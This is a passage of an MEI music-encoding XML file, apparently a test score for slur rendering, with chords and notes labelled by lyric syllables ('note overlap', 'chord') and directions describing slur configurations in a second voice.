xml:id=\"note-L155F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L155F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L155F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L155F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L155F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L155F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L155F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L155F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L155F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L155F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L155F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L155F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L155F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L155F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L155F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L155F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L155F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L155F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L155F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L155F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L155F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L156F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L156F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L156F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L156F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L154F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L155F2\" dur=\"2\" ploc=\"g\" oloc=\"4\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L155F1N2-L156F1N1\" staff=\"1\" startid=\"#note-L155F1S1\" endid=\"#note-L156F1S1\" />\r\n                            <slur xml:id=\"slur-L155F1N1-L156F1N2\" staff=\"1\" startid=\"#note-L155F1S2\" endid=\"#note-L156F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L157\" n=\"44\">\r\n                            <staff xml:id=\"staff-L157F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L157F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L158F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L158F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L158F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L158F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L158F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L158F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L158F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L158F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L158F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L158F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L158F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L158F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L158F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L158F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L158F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L158F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L158F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L158F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L158F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L158F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L158F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L158F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L159F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L159F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L159F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L159F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L157F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L158F2\" dur=\"2\" ploc=\"f\" oloc=\"3\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L158F1N2-L159F1N1\" staff=\"1\" startid=\"#note-L158F1S1\" endid=\"#note-L159F1S1\" />\r\n                            <slur xml:id=\"slur-L158F1N1-L159F1N2\" staff=\"1\" startid=\"#note-L158F1S2\" endid=\"#note-L159F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L161\" n=\"45\">\r\n                            <staff xml:id=\"staff-L161F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L161F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L162F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L162F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L162F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L162F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L162F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L162F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L162F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L162F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L162F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L162F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L162F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L162F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L162F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L162F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L162F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L162F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L162F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L162F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L162F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L162F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L162F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L162F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L163F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L163F1S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L163F1S2\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L163F1S3\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L161F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L162F2\" dur=\"2\" ploc=\"f\" oloc=\"3\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L162F1N3-L163F1N1\" staff=\"1\" startid=\"#note-L162F1S1\" endid=\"#note-L163F1S1\" />\r\n                            <slur xml:id=\"slur-L162F1N2-L163F1N2\" staff=\"1\" startid=\"#note-L162F1S3\" endid=\"#note-L163F1S3\" />\r\n                            <slur xml:id=\"slur-L162F1N1-L163F1N3\" staff=\"1\" startid=\"#note-L162F1S2\" endid=\"#note-L163F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L164\" n=\"46\">\r\n                            <staff xml:id=\"staff-L164F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L164F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L165F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L165F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L165F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L165F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L165F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L165F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L165F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L165F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L165F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L165F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L165F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L165F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L165F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L165F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L165F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L165F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L165F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L165F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L165F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L165F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L165F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L165F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L166F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L166F1S1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L166F1S2\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L166F1S3\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L164F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L165F2\" dur=\"2\" ploc=\"g\" oloc=\"4\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L165F1N3-L166F1N1\" staff=\"1\" startid=\"#note-L165F1S3\" endid=\"#note-L166F1S3\" />\r\n                            <slur xml:id=\"slur-L165F1N2-L166F1N2\" staff=\"1\" startid=\"#note-L165F1S1\" endid=\"#note-L166F1S1\" />\r\n                            <slur xml:id=\"slur-L165F1N1-L166F1N3\" staff=\"1\" startid=\"#note-L165F1S2\" endid=\"#note-L166F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L167\" n=\"47\">\r\n                            <staff xml:id=\"staff-L167F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L167F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L168F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L168F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L168F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L168F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L168F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L168F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L168F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L168F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L168F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L168F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L168F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L168F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L168F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L168F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L168F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L168F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L168F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L168F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L168F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L168F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L168F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L168F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L169F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L169F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L169F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L169F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L167F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L168F2\" dur=\"2\" ploc=\"g\" oloc=\"4\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L168F1N3-L169F1N1\" staff=\"1\" startid=\"#note-L168F1S3\" endid=\"#note-L169F1S1\" />\r\n                            <slur xml:id=\"slur-L168F1N2-L169F1N2\" staff=\"1\" startid=\"#note-L168F1S1\" endid=\"#note-L169F1S3\" />\r\n                            <slur xml:id=\"slur-L168F1N1-L169F1N3\" staff=\"1\" startid=\"#note-L168F1S2\" endid=\"#note-L169F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L170\" right=\"end\" n=\"48\">\r\n                            <staff xml:id=\"staff-L170F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L170F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L171F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L171F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L171F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L171F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L171F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L171F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L171F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L171F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L171F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L171F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L171F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L171F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L171F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L171F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L171F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L171F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L171F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L171F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L171F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L171F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L171F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L171F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L172F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L172F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L172F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L172F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L170F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L171F2\" dur=\"2\" ploc=\"f\" oloc=\"3\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L171F1N3-L172F1N1\" staff=\"1\" startid=\"#note-L171F1S1\" endid=\"#note-L172F1S3\" />\r\n                            <slur xml:id=\"slur-L171F1N2-L172F1N2\" staff=\"1\" startid=\"#note-L171F1S3\" endid=\"#note-L172F1S1\" />\r\n                            <slur xml:id=\"slur-L171F1N1-L172F1N3\" staff=\"1\" startid=\"#note-L171F1S2\" endid=\"#note-L172F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L174\">\r\n                            <staff xml:id=\"staff-L174F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L174F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L179F1\" dur=\"1\" ploc=\"b\" oloc=\"4\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L179F2N2\" n=\"2\">\r\n                                    <note xml:id=\"note-L179F2\" dur=\"2\" oct=\"4\" pname=\"c\" stem.len=\"5.500000\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L179F3\" color=\"#ccc\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L179F3\">slurs:</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L179F4\" color=\"#aaa\" n=\"2\">\r\n                                            <syl xml:id=\"syl-L179F4\">attachment:</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L179F5\" color=\"#ddd\" n=\"3\">\r\n                                            <syl xml:id=\"syl-L179F5\">comments:</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                    <note xml:id=\"note-L180F2\" dur=\"4\" oct=\"4\" pname=\"c\" stem.len=\"5.500000\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L180F3\" color=\"#ccc\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L180F3\">1</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L180F4\" color=\"#aaa\" n=\"2\">\r\n                                            <syl xml:id=\"syl-L180F4\">note</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                    <note xml:id=\"note-L181F2\" dur=\"4\" oct=\"4\" pname=\"d\" stem.len=\"5.500000\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dir xml:id=\"dir-L179F1\" place=\"above\" staff=\"1\" tstamp=\"1.000000\">\r\n                                <rend xml:id=\"rend-0000001812508892\" fontstyle=\"normal\">Second voice, single notes with 1 slur connecting them</rend>\r\n                            </dir>\r\n                            <slur xml:id=\"slur-L180F2-L181F2N1\" staff=\"1\" startid=\"#note-L180F2\" endid=\"#note-L181F2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L182\" n=\"49\">\r\n                            <staff xml:id=\"staff-L182F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L182F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L183F1\" dur=\"2\" ploc=\"e\" oloc=\"6\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L182F2N2\" n=\"2\">\r\n                                    <note xml:id=\"note-L183F2\" dur=\"4\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L183F3\" color=\"#ccc\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L183F3\">1</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L183F4\" color=\"#aaa\" n=\"2\">\r\n                                            <syl xml:id=\"syl-L183F4\">note</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                    <note xml:id=\"note-L184F2\" dur=\"4\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L183F2-L184F2N1\" staff=\"1\" startid=\"#note-L183F2\" endid=\"#note-L184F2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L185\" n=\"50\">\r\n                            <staff xml:id=\"staff-L185F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L185F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L186F1\" dur=\"2\" ploc=\"e\" oloc=\"6\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L185F2N2\" n=\"2\">\r\n                                    <note xml:id=\"note-L186F2\" dur=\"4\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L186F3\" color=\"#ccc\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L186F3\">1</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L186F4\" color=\"#aaa\" n=\"2\">\r\n                                            <syl xml:id=\"syl-L186F4\">note</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                    <note xml:id=\"note-L187F2\" dur=\"4\" oct=\"4\" pname=\"c\" stem.len=\"5.500000\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L186F2-L187F2N1\" staff=\"1\" startid=\"#note-L186F2\" endid=\"#note-L187F2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L188\" right=\"dbl\" n=\"51\">\r\n                            <staff xml:id=\"staff-L188F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L188F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L189F1\" dur=\"2\" ploc=\"b\" oloc=\"4\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L188F2N2\" n=\"2\">\r\n                                    <note xml:id=\"note-L189F2\" dur=\"4\" oct=\"4\" pname=\"c\" stem.len=\"5.500000\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L189F3\" color=\"#ccc\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L189F3\">1</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L189F4\" color=\"#aaa\" n=\"2\">\r\n                                            <syl xml:id=\"syl-L189F4\">note</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                    <note xml:id=\"note-L190F2\" dur=\"4\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L189F2-L190F2N1\" staff=\"1\" startid=\"#note-L189F2\" endid=\"#note-L190F2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L191\" n=\"52\">\r\n                            <staff xml:id=\"staff-L191F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L191F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L195F1\" dur=\"2\" ploc=\"b\" oloc=\"4\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L191F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L195F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L195F2S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L195F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L195F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L195F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L195F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L195F2S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L195F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L195F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L195F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L195F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L196F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L196F2S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L196F2S2\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <dir xml:id=\"dir-L195F1\" place=\"above\" staff=\"1\" tstamp=\"1.000000\">\r\n                                <rend xml:id=\"rend-0000000539266112\" fontstyle=\"normal\">Second voice, two-note chords with 1 and 2 slurs</rend>\r\n                            </dir>\r\n                            <slur xml:id=\"slur-L195F2-L196F2N1\" staff=\"1\" startid=\"#chord-L195F2\" endid=\"#chord-L196F2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L197\" n=\"53\">\r\n                            <staff xml:id=\"staff-L197F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L197F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L198F1\" dur=\"2\" ploc=\"e\" oloc=\"6\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L197F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L198F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L198F2S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L198F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L198F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L198F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L198F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L198F2S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L198F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L198F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L198F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L198F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L199F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L199F2S1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L199F2S2\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L198F2-L199F2N1\" staff=\"1\" startid=\"#chord-L198F2\" endid=\"#chord-L199F2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L200\" n=\"54\">\r\n                            <staff xml:id=\"staff-L200F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L200F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L201F1\" dur=\"2\" ploc=\"e\" oloc=\"6\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L200F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L201F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L201F2S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L201F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L201F3\">1</syl>\r\n                                            